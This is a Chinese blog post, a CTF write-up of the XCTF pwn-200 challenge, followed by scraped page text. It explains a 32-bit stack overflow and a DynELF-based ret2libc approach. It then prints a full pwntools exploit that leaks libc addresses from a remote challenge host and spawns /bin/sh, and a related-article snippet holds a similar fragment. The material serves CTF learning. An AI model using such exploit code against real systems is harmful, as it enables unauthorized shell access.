pwn-200(xctf)

最新推荐文章于 2023-10-19 23:01:10 发布
最新推荐文章于 2023-10-19 23:01:10 发布
阅读量603 收藏 2
点赞数 1
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/107878667
版权

0x0 程序保护和流程

保护:

protect

流程:

main()

main

overflow()

overflow

明显的栈溢出漏洞。

0x1 利用过程

1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。

2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。

3.payload的构造(以DynELF为例):

  • payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(sys_addr)+p32(0)+p32(bss_addr) #这种构造方式需要将read的参数pop出栈后再调用system函数。
  • payload=padding+p32(read_plt)+p32(sys_addr)+p32(0)+p32(bss_addr)+p32(8) #这种构造方式利用了read函数的三个参数中的前两个可以和system函数的返回地址和参数相吻合,所以不需要清栈。

0x2 exp

from pwn import *
sh=remote('220.249.52.133','54489')
# sh=process('./a')
elf=ELF('./a')
write_plt=elf.plt['write']
read_plt=elf.plt['read']
bss_addr=elf.bss()
padding=(0x6c+4)*'a'
main_addr=0x080484BE
ppp_addr=0x080485cd


def leak(address):
    payload=padding+p32(write_plt)+p32(main_addr)+p32(1)+p32(address)+p32(4)
    sh.sendafter("Welcome to XDCTF2015~!\n",payload)
    return sh.recv(4)

d=DynELF(leak,elf=elf)
sys_addr=d.lookup('system','libc')
# payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(sys_addr)+p32(0)+p32(bss_addr)
payload=padding+p32(read_plt)+p32(sys_addr)+p32(0)+p32(bss_addr)+p32(8)
sh.sendafter("Welcome to XDCTF2015~!\n",payload)
sh.send("/bin/sh\x00")
sh.interactive()
whiteh4nd
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1704
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 405
做题记录
攻防世界 pwn-200
weixin_56777139的博客
03-20 171
32位 ret2libc。
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 584
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
lctf2016_pwn200 堆利用
人饭子的博客
12-31 487
lctf2016:pwn200 堆利用 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由l...
LCTF 2016:pwn200 解法1
最新发布
weixin_39678876的博客
10-19 65
还可通过house-of-spirit,在stack上构造fake chunk的方法,但思路大同小异。都是执行shellcode来获取shell。经计算,shellcode长度正好小于0x30,可通过修改返回地址为stack上,执行shellcode代码,获取shell。存在数组越界漏洞,结合strcpy可造成一个地址的任意地址写。存在off-by-on漏洞,可泄露stack地址。查看反汇编,发现可利用漏洞代码。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn-200题目文件
02-16
pwn-200题目文件
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1293
题目地址:pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
XCTF PWN高手进阶区之pwn-200
neuisf的博客
01-29 639
此题,setbuf未发现有什么作用! exp: from pwn import * sub_addr=0x8048484 def leak(addr): payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4) p.sendline(payload) return p.recv()[:4] p=process("./p...
xctf攻防世界pwn基础题解(新手食用)
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2182
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值